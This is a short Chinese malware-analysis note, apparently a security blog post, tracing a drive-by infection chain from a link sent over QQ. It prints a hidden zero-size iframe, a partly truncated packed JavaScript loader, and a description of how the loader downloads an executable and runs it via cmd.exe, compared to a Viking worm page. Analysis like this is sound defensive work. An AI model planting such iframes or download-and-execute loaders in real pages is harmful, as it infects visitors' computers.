QQ收到信息:
/--- ---/ hxxp://www.b**b**a*imm.info 主页包含代码: /--- <iframe src=hxxp://www.9*7***72***5.com/do**e1****2.htm width=0 height=0></iframe> ---/ hxxp://www.9*7***72***5.com/do**e1****2.htm 包含代码: /--- <script src=css.js></script> ---/ css.js 的内容为 JavaScript代码: /--- eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('Z("//j//w……(略)……|110|114'.split('|'),0,{})) ---/
解密后的内容为一段 JavaScript脚本,主要功能是运行自定义函数 gn(n),利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 97725.exe,保存为 %windir%/~tmp.tmp,并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
加密方法与昨天发现的
一个传播 Worm.Win32.Viking.jg的 网页,解密有点难度
相同,就是下载的文件不同。
